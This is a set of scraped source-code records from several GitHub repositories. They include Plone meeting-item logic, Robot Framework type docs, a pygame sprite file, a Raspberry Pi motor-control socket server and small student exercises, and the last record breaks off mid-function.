mayCloneToOtherMeetingConfig(self, destMeetingConfigId, automatically=False):\n '''Checks that we can clone the item to another meetingConfigFolder.\n These are light checks as this could be called several times. This\n method can be adapted.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n\n # item must be sendable and not already sent\n if destMeetingConfigId not in item.getOtherMeetingConfigsClonableTo() or \\\n item._checkAlreadyClonedToOtherMC(destMeetingConfigId):\n return False\n\n # Regarding item state, the item has to be :\n # - current state in itemAutoSentToOtherMCStates;\n # - current state in itemManualSentToOtherMCStates/itemAutoSentToOtherMCStates\n # and user have ModifyPortalContent or is a MeetingManager.\n item_state = item.query_state()\n if not ((automatically and\n item_state in cfg.getItemAutoSentToOtherMCStates()) or\n (not automatically and\n (item_state in cfg.getItemManualSentToOtherMCStates() or\n item_state in cfg.getItemAutoSentToOtherMCStates()) and\n (_checkPermission(ModifyPortalContent, item) or tool.isManager(cfg)))\n ):\n return False\n\n # Can not clone an item to the same meetingConfig as the original item,\n # or if the given destMeetingConfigId is not clonable to.\n if (cfg.getId() == destMeetingConfigId) or \\\n destMeetingConfigId not in [mctct['meeting_config'] for mctct in cfg.getMeetingConfigsToCloneTo()]:\n return False\n\n return True\n\n def _checkAlreadyClonedToOtherMC(self, destMeetingConfigId):\n '''Check if the item has already been sent to the given\n destMeetingConfigId.'''\n annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n ann = IAnnotations(self)\n if ann.get(annotation_key, False):\n return True\n return False\n\n security.declarePrivate('getItemClonedToOtherMC')\n\n def getItemClonedToOtherMC(self, destMeetingConfigId, theObject=True):\n '''Returns the item cloned to the destMeetingConfigId if any.\n If p_theObject is True, the real object is returned, if not, we return the brain.'''\n annotation_key = self._getSentToOtherMCAnnotationKey(destMeetingConfigId)\n ann = IAnnotations(self)\n itemUID = ann.get(annotation_key, None)\n if itemUID:\n catalog = api.portal.get_tool('portal_catalog')\n # we search unrestricted because current user could not have access to the other item\n brains = catalog.unrestrictedSearchResults(UID=itemUID)\n if brains:\n if theObject:\n return brains[0]._unrestrictedGetObject()\n else:\n return brains[0]\n return None\n\n security.declarePrivate('manage_beforeDelete')\n\n def manage_beforeDelete(self, item, container):\n '''This is a workaround to avoid a Plone design problem where it is\n possible to remove a folder containing objects you can not\n remove.'''\n # If we are here, everything has already been checked before.\n # Just check that the item is myself, a Plone Site or removing a MeetingConfig.\n # We can remove an item directly, not \"through\" his container.\n if item.meta_type not in ('Plone Site', 'MeetingConfig', 'MeetingItem'):\n user_id = get_current_user_id(item.REQUEST)\n logger.warn(BEFOREDELETE_ERROR % (user_id, self.id))\n raise BeforeDeleteException(\n translate(\"can_not_delete_meetingitem_container\",\n domain=\"plone\",\n context=item.REQUEST))\n # if we are not removing the site and we are not in the creation process of\n # an item, manage predecessor\n if item.meta_type not in ['Plone Site', 'MeetingConfig'] and not item._at_creation_flag:\n # If the item has a predecessor in another meetingConfig we must remove\n # the annotation on the predecessor specifying it.\n predecessor = self.get_predecessor()\n if predecessor:\n tool = api.portal.get_tool('portal_plonemeeting')\n cfgId = tool.getMeetingConfig(self).getId()\n if predecessor._checkAlreadyClonedToOtherMC(cfgId):\n ann = IAnnotations(predecessor)\n annotation_key = self._getSentToOtherMCAnnotationKey(\n cfgId)\n del ann[annotation_key]\n # reindex predecessor's sentToInfos index\n reindex_object(predecessor, idxs=['sentToInfos'], update_metadata=0)\n # manage_beforeDelete is called before the IObjectWillBeRemovedEvent\n # in IObjectWillBeRemovedEvent references are already broken, we need to remove\n # the item from a meeting if it is inserted in there...\n # do this only when not removing meeting including items\n if not item.REQUEST.get('items_to_remove') and item.hasMeeting():\n item.getMeeting().remove_item(item)\n # and to clean advice inheritance\n for adviceId in item.adviceIndex.keys():\n self._cleanAdviceInheritance(item, adviceId)\n\n BaseFolder.manage_beforeDelete(self, item, container)\n\n def _cleanAdviceInheritance(self, item, adviceId):\n '''Clean advice inheritance for given p_adviceId on p_item.'''\n successors = self.get_every_successors()\n for successor in successors:\n if successor.adviceIndex.get(adviceId, None) and \\\n successor.adviceIndex[adviceId]['inherited']:\n successor.adviceIndex[adviceId]['inherited'] = False\n successor.update_local_roles()\n\n security.declarePublic('get_attendees')\n\n def get_attendees(self, the_objects=False, ordered=True):\n '''Returns the attendees for this item, so people that are \"present\".'''\n res = []\n if not self.hasMeeting():\n return res\n meeting = self.getMeeting()\n attendees = meeting.get_attendees(the_objects=False)\n item_absents = self.get_item_absents()\n item_excused = self.get_item_excused()\n item_non_attendees = self.get_item_non_attendees()\n attendees = [attendee for attendee in attendees\n if attendee not in item_absents + item_excused + item_non_attendees]\n # get really present attendees now\n if ordered:\n attendees = self._order_contacts(attendees)\n attendees = meeting._get_contacts(uids=attendees, the_objects=the_objects)\n return attendees\n\n def _order_contacts(self, uids):\n \"\"\" \"\"\"\n return [uid for uid in self.get_all_attendees(ordered=True)\n if uid in uids]\n\n def get_all_attendees(self, uids=[], the_objects=False, ordered=True):\n '''Returns every attendees for this item, including absents, excused, ...'''\n if not self.hasMeeting():\n return ()\n meeting = self.getMeeting()\n if ordered and not uids:\n uids = meeting._get_item_attendees_order(self.UID())\n return meeting.get_all_attendees(uids, the_objects=the_objects)\n\n def _appendLinkedItem(self, item, tool, cfg, only_viewable):\n if not only_viewable:\n return True\n hideNotViewableLinkedItemsTo = cfg.getHideNotViewableLinkedItemsTo()\n if hideNotViewableLinkedItemsTo and \\\n tool.isPowerObserverForCfg(cfg, power_observer_types=hideNotViewableLinkedItemsTo) and \\\n not _checkPermission(View, item):\n return False\n return True\n\n def downOrUpWorkflowAgain_cachekey(method, self, brain=False):\n '''cachekey method for self.downOrUpWorkflowAgain.'''\n repr_self = None\n last_action_time = None\n if not self.hasMeeting():\n repr_self = repr(self)\n last_action_time = getLastWFAction(self)[\"time\"]\n return repr_self, last_action_time\n\n security.declarePrivate('downOrUpWorkflowAgain')\n\n # not ramcached perf tests says it does not change anything\n # and this avoid useless entry in cache\n # @ram.cache(downOrUpWorkflowAgain_cachekey)\n def downOrUpWorkflowAgain(self):\n \"\"\"Was current item already in same review_state before?\n And if so, is it up or down the workflow?\"\"\"\n res = \"\"\n if not self.hasMeeting() and \\\n not self.query_state() == 'validated' and \\\n not self.isDefinedInTool():\n res = down_or_up_wf(self)\n return res\n\n security.declarePublic('show_votes')\n\n def show_votes(self):\n '''Must I show the \"votes\" tab on this item?'''\n res = False\n if self.hasMeeting() and self.getMeeting().adapted().show_votes():\n # Checks whether votes may occur on this item\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n res = self.getPollType() != 'no_vote' and \\\n self.get_item_voters() and \\\n cfg.isVotable(self)\n return res\n\n security.declarePublic('get_vote_count')\n\n def get_vote_count(self, vote_value, vote_number=0):\n '''Gets the number of votes for p_vote_value.\n A special value 'any_votable' may be passed for p_vote_value,\n in this case every values other than NOT_VOTABLE_LINKED_TO_VALUE are counted.'''\n res = 0\n itemVotes = self.get_item_votes(vote_number)\n item_voter_uids = self.get_item_voters()\n # when initializing, so Meeting.item_votes is empty\n # only return count for NOT_ENCODED_VOTE_VALUE\n if not itemVotes and vote_value == NOT_ENCODED_VOTE_VALUE:\n res = len(item_voter_uids)\n elif not self.get_vote_is_secret(vote_number):\n # public\n for item_voter_uid in item_voter_uids:\n if (item_voter_uid not in itemVotes['voters'] and\n vote_value == NOT_ENCODED_VOTE_VALUE) or \\\n (item_voter_uid in itemVotes['voters'] and\n vote_value == itemVotes['voters'][item_voter_uid]) or \\\n (item_voter_uid in itemVotes['voters'] and\n vote_value == 'any_votable' and\n itemVotes['voters'][item_voter_uid] != NOT_VOTABLE_LINKED_TO_VALUE):\n res += 1\n else:\n # secret\n if vote_value in itemVotes['votes']:\n res = itemVotes['votes'][vote_value] or 0\n elif vote_value == 'any_votable':\n res = len(item_voter_uids)\n elif vote_value == NOT_ENCODED_VOTE_VALUE:\n total = len(item_voter_uids)\n voted = sum([item_vote_count or 0 for item_vote_value, item_vote_count\n in itemVotes['votes'].items()])\n res = total - voted\n elif vote_value == 'any_voted':\n res = sum([item_vote_count or 0 for item_vote_value, item_vote_count\n in itemVotes['votes'].items()])\n return res\n\n security.declarePublic('setFieldFromAjax')\n\n def setFieldFromAjax(self, fieldName, fieldValue):\n '''See doc in utils.py.'''\n # invalidate advices if needed\n if self.willInvalidateAdvices():\n self.update_local_roles(invalidate=True)\n # historize given advices if necessary\n self._historizeAdvicesOnItemEdit()\n return set_field_from_ajax(self, fieldName, fieldValue)\n\n security.declarePublic('getFieldVersion')\n\n def getFieldVersion(self, fieldName, changes=False):\n '''See doc in utils.py.'''\n return getFieldVersion(self, fieldName, changes)\n\n security.declarePublic('getRichTextCSSClass')\n\n def getRichTextCSSClass(self, field_name):\n '''Let's arbitrary add custom CSS class to a RichText widget.'''\n if field_name == 'votesResult':\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # we return \"modified\" if field contains something\n if tool.isManager(cfg) and self.getRawVotesResult(real=True):\n return \"highlightValue\"\n elif field_name == 'marginalNotes' and self.getRawMarginalNotes():\n return \"highlightValue\"\n return \"\"\n\n security.declarePublic('getRichTextOnSend')\n\n def getRichTextOnSend(self, field_name):\n '''Manage onSend JS parameter of askAjaxChunk for given p_field_name.'''\n if field_name == 'votesResult':\n return \"reloadVotesResult\"\n return \"null\"\n\n security.declarePrivate('getAdviceRelatedIndexes')\n\n def getAdviceRelatedIndexes(self):\n '''See doc in interfaces.py.'''\n return ['indexAdvisers']\n\n security.declarePrivate('getReviewStateRelatedIndexes')\n\n def getReviewStateRelatedIndexes(self):\n '''See doc in interfaces.py.'''\n return ['downOrUpWorkflowAgain', 'getTakenOverBy',\n 'reviewProcessInfo', 'previous_review_state']\n\n def getIndexesRelatedTo(self, related_to='annex', check_deferred=True):\n '''See doc in interfaces.py.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n idxs = ['pm_technical_index', 'SearchableText']\n if related_to == 'annex':\n idxs.append('annexes_index')\n elif related_to == 'item_reference':\n pass\n if check_deferred and related_to in tool.getDeferParentReindex():\n # mark item reindex deferred so it can be updated at right moment\n item = self.getSelf()\n setattr(item, REINDEX_NEEDED_MARKER, True)\n idxs.remove('SearchableText')\n return idxs\n\n def _mayChangeAttendees(self):\n \"\"\"Check that user may quickEdit\n item_absents/item_excused/item_non_attendees/votes/...\"\"\"\n return self.hasMeeting() and checkMayQuickEdit(\n self, bypassWritePermissionCheck=True, onlyForManagers=True)\n\n def mayDisplayProposingGroupUsers(self):\n \"\"\" \"\"\"\n res = False\n proposingGroup = self.getProposingGroup()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n if not proposingGroup or \\\n proposingGroup in tool.get_orgs_for_user() or \\\n tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('getLabelItemAssembly')\n\n def getLabelItemAssembly(self):\n '''\n Depending on the fact that we use 'itemAssembly' alone or\n 'assembly, excused, absents', we will translate the 'assembly' label\n a different way.\n '''\n if self.attribute_is_used('assembly_excused') or \\\n self.attribute_is_used('assembly_absents'):\n return _('attendees_for_item')\n else:\n return _('PloneMeeting_label_itemAssembly')\n\n def get_representatives_in_charge(self, check_is_attendee=True):\n '''Return the representative in charge of this item depending on\n selected MeetingItem.groupsInCharge.\n Default use is when item in a meeting so we can check meeting date\n and if representative is attendee for the meeting.'''\n groups_in_charge = self.getGroupsInCharge(theObjects=True)\n meeting = self.getMeeting()\n meeting_date = meeting.date if meeting else None\n attendees = self.get_attendees(the_objects=True)\n res = []\n for gic in groups_in_charge:\n # when p_check_is_attendee=True,\n # only keep held_positions that are also attendees for self\n res += [hp for hp in gic.get_representatives(at_date=meeting_date)\n if (not check_is_attendee or hp in attendees) and\n hp not in res]\n return res\n\n def is_decided(self, cfg, item_state=None, positive_only=False):\n '''Is item considered decided?'''\n item_state = item_state or self.query_state()\n if positive_only:\n return item_state in cfg.getPositiveDecidedStates()\n else:\n return item_state in cfg.getItemDecidedStates()\n\n\nregisterType(MeetingItem, PROJECTNAME)\n","repo_name":"IMIO/Products.PloneMeeting","sub_path":"src/Products/PloneMeeting/MeetingItem.py","file_name":"MeetingItem.py","file_ext":"py","file_size_in_byte":388046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42774239155","text":"codigofunciona = False\n\nwhile codigofunciona == False:\n perguntaaluno = input(\"Código está executando? \")\n if perguntaaluno == 'n':\n print(\"Corrija o código e tente de novo\")\n elif perguntaaluno == 's':\n perguntadois = input(\"Produz o resultado correto? \")\n if perguntadois == \"n\":\n print(\"Corrija o código e tente de novo e volte para o começo de tudo\")\n elif perguntadois == \"s\":\n print(\"Parabéns!\")\n codigofunciona = True","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_150/ch138_2020_04_01_19_07_18_250656.py","file_name":"ch138_2020_04_01_19_07_18_250656.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13514998862","text":"from inspect import isclass\nfrom enum import Enum\n\nfrom robot.utils import getdoc, Sortable, typeddict_types, type_name\nfrom robot.running import TypeConverter\n\nfrom .standardtypes import STANDARD_TYPE_DOCS\n\n\nEnumType = type(Enum)\n\n\nclass TypeDoc(Sortable):\n ENUM = 'Enum'\n TYPED_DICT = 'TypedDict'\n CUSTOM = 'Custom'\n STANDARD = 'Standard'\n\n def __init__(self, type, name, doc, accepts=(), usages=None,\n members=None, items=None):\n self.type = type\n self.name = name\n self.doc = doc or '' # doc parsed from XML can be None.\n self.accepts = [type_name(t) if not isinstance(t, str) else t for t in accepts]\n self.usages = usages or []\n # Enum members and TypedDict items are used only with appropriate types.\n self.members = members\n self.items = items\n\n @property\n def _sort_key(self):\n return self.name.lower()\n\n @classmethod\n def for_type(cls, type_info, converters):\n if isinstance(type_info.type, EnumType):\n return cls.for_enum(type_info.type)\n if isinstance(type_info.type, typeddict_types):\n return cls.for_typed_dict(type_info.type)\n converter = TypeConverter.converter_for(type_info, converters)\n if not converter:\n return None\n elif not converter.type:\n return cls(cls.CUSTOM, converter.type_name, converter.doc,\n converter.value_types)\n else:\n # Get `type_name` from class, not from instance, to get the original\n # name with generics like `list[int]` that override it in instance.\n return cls(cls.STANDARD, type(converter).type_name,\n STANDARD_TYPE_DOCS[converter.type], converter.value_types)\n\n @classmethod\n def for_enum(cls, enum):\n accepts = (str, int) if issubclass(enum, int) else (str,)\n return cls(cls.ENUM, enum.__name__, getdoc(enum), accepts,\n members=[EnumMember(name, str(member.value))\n for name, member in enum.__members__.items()])\n\n @classmethod\n def for_typed_dict(cls, typed_dict):\n items = []\n required_keys = list(getattr(typed_dict, '__required_keys__', []))\n optional_keys = list(getattr(typed_dict, '__optional_keys__', []))\n for key, value in typed_dict.__annotations__.items():\n typ = value.__name__ if isclass(value) else str(value)\n required = key in required_keys if required_keys or optional_keys else None\n items.append(TypedDictItem(key, typ, required))\n return cls(cls.TYPED_DICT, typed_dict.__name__, getdoc(typed_dict),\n accepts=(str, 'Mapping'), items=items)\n\n def to_dictionary(self):\n data = {\n 'type': self.type,\n 'name': self.name,\n 'doc': self.doc,\n 'usages': self.usages,\n 'accepts': self.accepts\n }\n if self.members is not None:\n data['members'] = [m.to_dictionary() for m in self.members]\n if self.items is not None:\n data['items'] = [i.to_dictionary() for i in self.items]\n return data\n\n\nclass TypedDictItem:\n\n def __init__(self, key, type, required=None):\n self.key = key\n self.type = type\n self.required = required\n\n def to_dictionary(self):\n return {'key': self.key, 'type': self.type, 'required': self.required}\n\n\nclass EnumMember:\n\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def to_dictionary(self):\n return {'name': self.name, 'value': self.value}\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/libdocpkg/datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"22600422672","text":"def zero_matrix(m, n): #m as cols and n as rows\n matrix = []\n for i in range(m):\n rows = []\n for j in range(n):\n rows.append(0)\n matrix.append(rows)\n return matrix\n\nprint(zero_matrix(2, 3))","repo_name":"pujahabibi/codingInterview","sub_path":"Array_Strings/zero_matrix.py","file_name":"zero_matrix.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44449657321","text":"#recieving information from the users pc\nimport RPi.GPIO as GPIO\nimport socket\nimport time\nimport sys\nfrom _thread import *\n#setting up the networking defenitions\nhost = ''\nport = 5555\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n#setting up the GPIO defenitions\nGPIO.cleanup()\nGPIO.setmode(GPIO.BOARD)\nclockR = 11\ncounterclockR = 15\nPWMR = 13\nclockL = 16\ncounterclockL = 18\nPWML = 12\nGPIO.setup(clockR,GPIO.OUT)\nGPIO.setup(counterclockR,GPIO.OUT)\nGPIO.setup(PWMR,GPIO.OUT)\npwmrV = GPIO.PWM(PWMR,20000)\npwmrV.start(0)\nGPIO.setup(clockL,GPIO.OUT)\nGPIO.setup(counterclockL,GPIO.OUT)\nGPIO.setup(PWML,GPIO.OUT)\npwmlV = GPIO.PWM(PWML,20000)\npwmlV.start(0)\ntry:\n\ts.bind((host,port))\nexcept socket.error as e:\n\tprint(str(e))\n\ns.listen(5)\n\ndef threaded_client(conn):\n\twhile True:\n\t\tdata = conn.recv(256)\n\t\tif len(data)>0:\n\t\t\t#reading the string format\n\t\t\tclean_data = b''\n\t\t\tfor i in range(0,256):\n\t\t\t\tif data[i]==0 and data[i+1]==0:\n\t\t\t\t\tbreak\n\t\t\t\tclean_data += bytes([data[i]])\n\t\t\tdata_string = clean_data.decode('utf-8')\n\t\t\tdata_int = list(map(int,data_string.split(',')))\n\t\t\t#data_int format:\n\t\t\t#data_int[0] - motor1 clockwise direction\n\t\t\t#data_int[1] = motor1 counterclockwise direction\n\t\t\t#data_int[2] = motor1 PWM duty cycle\n\t\t\t#data_int[3] = motor2 clockwise ...\n\t\t\t#data_int[4] = motor2 counterclockwise ...\n\t\t\t#data_int[5] = motor2 PWM\n\t\t\tif data_int[0]==2:\n\t\t\t\tpwmrV.stop()\n\t\t\t\tpwmlV.stop()\n\t\t\t\tGPIO.cleanup()\n\t\t\t\tsys.exit()\n\t\t\tGPIO.output(clockR,data_int[0])\n\t\t\tGPIO.output(counterclockR,data_int[1])\n\t\t\tGPIO.output(clockL,data_int[3])\n\t\t\tGPIO.output(counterclockL,data_int[4])\n\t\t\tpwmrV.ChangeDutyCycle(data_int[2])\n\t\t\tpwmlV.ChangeDutyCycle(data_int[5])\n\t\t\t#print('recieved data:',data_int)\n\nwhile True:\n\tconn,addr = s.accept()\n\tstart_new_thread(threaded_client, (conn,))\n","repo_name":"Fritterino/Trackss-Code","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42154212983","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nFunctional tests for `ugetcli` package - `help` command.\nTests functionality of the cli help command with various options.\n\"\"\"\n\nimport unittest\nfrom click.testing import CliRunner\n\nfrom ugetcli import cli\n\n\nclass TestUGetCliHelp(unittest.TestCase):\n \"\"\"Tests for `ugetcli` package - help command.\"\"\"\n\n def test_cli_uget_help(self):\n \"\"\"Test cli: uget help\"\"\"\n runner = CliRunner()\n result = runner.invoke(cli.ugetcli, ['--help'], obj={})\n assert result.exit_code == 0\n assert '--help' in result.output\n assert 'Show this message and exit.' in result.output\n","repo_name":"AgeOfLearning/uget-cli","sub_path":"tests/functional/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22682677573","text":"import pandas as pd\n# import obspy\nfrom obspy.taup.taup_create import build_taup_model\nmod_text=pd.read_csv('./CDmod',sep=\"\\s+\",header=0,names=['vp','vs','rho','thick','depth','idx'])\niasp_text=pd.read_csv('./iasp91.tvel',sep=\"\\s+\",header=2,names=['depth','vp','vs','rho'])\nfileout=open(\"./CDmod.tvel\",\"w\")\nprint( \"CDmod P Model (%d layers) no \\\"discontinuity\\\" at 120, 760 km\" % (len(mod_text)),file=fileout)\nprint( \"CDmod S Model (%d values to cmb)\" % (len(mod_text)+iasp_text[iasp_text.depth==2939.330].index.tolist()[0]),file=fileout)\nfor ii in range(len(mod_text)):\n print(mod_text.depth[ii],mod_text.vp[ii],mod_text.vs[ii],mod_text.rho[ii],file=fileout)\nidx_0=iasp_text[iasp_text.depth>mod_text.depth[ii]].index.tolist()[0]\nfor jj in range(idx_0,len(iasp_text)):\n print(iasp_text.depth[jj],iasp_text.vp[jj],iasp_text.vs[jj],iasp_text.rho[jj],file=fileout)\nfileout.close()\nbuild_taup_model(\"./CDmod.tvel\")","repo_name":"georom1996/GCSRF_GIG_USTC-Training-Package","sub_path":"Section003/mod/make_tvel.py","file_name":"make_tvel.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"42977194186","text":"# File created by JT Wilcox\r\n\r\nimport pygame as pg\r\nfrom pygame.sprite import Sprite\r\nfrom settings import *\r\nfrom random import randint\r\n\r\n\r\nvec = pg.math.Vector2\r\n\r\n# player class\r\n\r\nclass Player(Sprite):\r\n def __init__(self, game):\r\n Sprite.__init__(self)\r\n # tproperties of the player sprite\r\n self.game = game\r\n self.image = pg.Surface((50,50))\r\n self.image.fill(RED)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (WIDTH/2, HEIGHT/2)\r\n self.pos = vec(WIDTH/2, HEIGHT/2)\r\n self.vel = vec(0,0)\r\n self.acc = vec(0,0)\r\n self.cofric = 0.1\r\n self.canjump = False\r\n def input(self):\r\n keystate = pg.key.get_pressed()\r\n # if a is pressed sprite will move left\r\n if keystate[pg.K_a]:\r\n self.acc.x = -PLAYER_ACC\r\n # if d is pressed sprite will move right\r\n if keystate[pg.K_d]:\r\n self.acc.x = PLAYER_ACC\r\n # if keystate[pg.K_p]:\r\n # if PAUSED == False:\r\n # PAUSED = True\r\n # print(PAUSED)\r\n # else:\r\n # PAUSED = False\r\n # print(PAUSED)\r\n # defines characteristics of when to jump and how high to jump\r\n def jump(self):\r\n self.rect.x += 1\r\n hits = pg.sprite.spritecollide(self, self.game.platforms, False)\r\n self.rect.x -= 1\r\n # if hits:\r\n self.vel.y = -PLAYER_JUMP\r\n # lets the player know when sprite has left the boundary and where it is\r\n def inbounds(self):\r\n if self.rect.x > WIDTH - 50:\r\n self.pos.x = WIDTH - 25\r\n self.vel.x = 0\r\n print(\"i am off the right side of the screen...\")\r\n if self.rect.x < 0:\r\n self.pos.x = 25\r\n self.vel.x = 0\r\n print(\"i am off the left side of the screen...\")\r\n if self.rect.y > HEIGHT:\r\n print(\"i am off the bottom of the screen\")\r\n if self.rect.y < 0:\r\n print(\"i am off the top of the screen...\")\r\n # what text will be displayed and how score will change when there is a collison\r\n def mob_collide(self):\r\n hits = pg.sprite.spritecollide(self, self.game.enemies, True)\r\n if hits:\r\n print(\"you collided with an enemy...\")\r\n self.game.score += 1\r\n print(SCORE)\r\n # puts gravity into game so player is not constabtly falling\r\n def update(self):\r\n self.acc = vec(0, PLAYER_GRAV)\r\n self.acc.x = self.vel.x * PLAYER_FRICTION\r\n self.input()\r\n self.vel += self.acc\r\n self.pos += self.vel + 0.5 * self.acc\r\n self.rect.midbottom = self.pos\r\n# mob class\r\nclass Mob(Sprite):\r\n # charactersitics of mab\r\n def __init__(self,width,height, color):\r\n Sprite.__init__(self)\r\n self.width = width\r\n self.height = height\r\n self.image = pg.Surface((self.width,self.height))\r\n self.color = color\r\n self.image.fill(self.color)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (WIDTH/2, HEIGHT/2)\r\n self.pos = vec(WIDTH/2, HEIGHT/2)\r\n self.vel = vec(randint(1,5),randint(1,5))\r\n self.acc = vec(1,1)\r\n self.cofric = 0.01\r\n\r\n # ...\r\n # make it so mobs are actually staying within the screen and are always visible\r\n def inbounds(self):\r\n if self.rect.x > WIDTH:\r\n self.vel.x *= -1\r\n \r\n if self.rect.x < 0:\r\n self.vel.x *= -1\r\n \r\n if self.rect.y < 0:\r\n self.vel.y *= -1\r\n \r\n if self.rect.y > HEIGHT:\r\n self.vel.y *= -1\r\n \r\n def update(self):\r\n self.inbounds()\r\n # self.pos.x += self.vel.x\r\n # self.pos.y += self.vel.y\r\n self.pos += self.vel\r\n self.rect.center = self.pos\r\n\r\n#platform class\r\n\r\nclass Platform(Sprite):\r\n # characteristics of platforms\r\n def __init__(self, width, height, x, y, color, variant):\r\n Sprite.__init__(self)\r\n self.width = width\r\n self.height = height\r\n self.image = pg.Surface((self.width,self.height))\r\n self.color = color\r\n self.image.fill(self.color)\r\n self.rect = self.image.get_rect()\r\n self.rect.x = x\r\n self.rect.y = y\r\n self.variant = variant","repo_name":"jtwilcox1/jwilcox_timeprogress","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37856655446","text":"from typing import Optional\nfrom ..models import LoadCurrenciesResponse\n\n\nasync def load_currencies(self, reload: Optional[bool] = False) -> LoadCurrenciesResponse:\n \"\"\"\n Retrieves and caches a list of currencies being traded on the dEX.\n\n Parameters\n ----------\n reload : bool\n (Optional) Whether to refresh the cache\n\n Returns\n -------\n xrpl_dex_sdk.models.LoadCurrenciesResponse\n The fetched currencies\n \"\"\"\n\n if self.currencies == None or reload == True:\n currencies = await self.fetch_currencies()\n self.currencies = currencies\n return self.currencies\n","repo_name":"AktaryTech/xrpl-dex-sdk-python","sub_path":"xrpl_dex_sdk/methods/load_currencies.py","file_name":"load_currencies.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34291014719","text":"hexa_table = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A' , 'B', 'C', 'D', 'E', 'F']\nnum=int(input(\"Enter any Number = \"))\nhexadeci = ''\n\nwhile(num>0):\n remainder = num%16\n hexadeci = hexa_table[remainder]+ hexadeci\n num = num//16\n \nprint(\"Hexadecimal Number: \",hexadeci)\n\n# ans=[]\n# dic={10:'a',11:'b' ,12:'c' ,13:'d' ,14:'e' ,15:'f'}\n# if(num==0):\n# print(\"0\")\n# if(num<0):\n# num=num+2**32\n# while(num>0):\n# dig=num%16\n# num=num//16\n# if(dig>9 and dig<16):\n# dig=dic[dig]\n# else:\n# dig=dic\n","repo_name":"avneeshk021/Python","sub_path":"hexadecimal.py","file_name":"hexadecimal.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74217625014","text":"# coding: utf-8\nimport click\nimport quandl\nfrom stock import util, models, params\n\n\ndef _multiple_decorator(funcs):\n def wrap(g):\n for f in funcs:\n g = f(g)\n return wrap\n\n\ndef mkdate(ctx, param, datestr):\n return util.str2date(datestr)\n\n\nclass AliasedGroup(click.Group):\n\n def get_command(self, ctx, cmd_name):\n rv = click.Group.get_command(self, ctx, cmd_name)\n if rv is not None:\n return rv\n matches = [x for x in self.list_commands(ctx)\n if x.startswith(cmd_name)]\n if not matches:\n return None\n elif len(matches) == 1:\n return click.Group.get_command(self, ctx, matches[0])\n ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))\n\n\n@click.group(cls=AliasedGroup, invoke_without_command=True)\n@click.option(\"-k\", \"--key\", envvar='QUANDL_CODE_API_KEY')\ndef cli(key):\n ctx = click.get_current_context()\n if ctx.invoked_subcommand is None:\n click.echo(ctx.get_help(), color=ctx.color)\n if key:\n quandl.ApiConfig.api_key = key\n\n\n@cli.command()\ndef init():\n models.drop_all()\n models.create_all()\n\n\n@cli.command()\ndef config(**kw):\n m = \", \".join(str(s) for (s, _) in params.get_signals().items())\n click.echo(\"SIGNALS: \" + m)\n\n m = \", \".join(str(s) for (s, _) in params.get_lines().items())\n click.echo(\"LINES: \" + m)\n","repo_name":"her0e1c1/pystock","sub_path":"stock/cli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"72444805813","text":"import frappe\nfrom frappe.model.document import Document\nfrom datetime import datetime, timedelta\nimport pytz\nimport requests\nfrom requests.auth import HTTPDigestAuth\nfrom requests.auth import HTTPBasicAuth\n\nclass IstChargingFunc(Document):\n\t@frappe.whitelist()\n\tdef get_request(self,url,end):\n\n\t\t#wb_password = self.get_password('password')\n\t\t#self.auth = HTTPBasicAuth(password)\n\t\treg_url = url+end\n\t\tresponse = requests.get(reg_url)\n\t\t# response.raise_for_status()\n\t\t# session = requests.Session()\n\t\t# session.auth = HTTPDigestAuth(password)\n\t\t#print(response.text)\n\t\treturn response.json()\n\t\n\t@frappe.whitelist()\n\tdef get_data(self):\n\t\twallbox_list = frappe.get_all(\"Wallbox\")\n\t\tfor el in wallbox_list:\n\t\t\twallbox_doc = frappe.get_doc(\"Wallbox\",el[\"name\"])\n\t\t\turl = 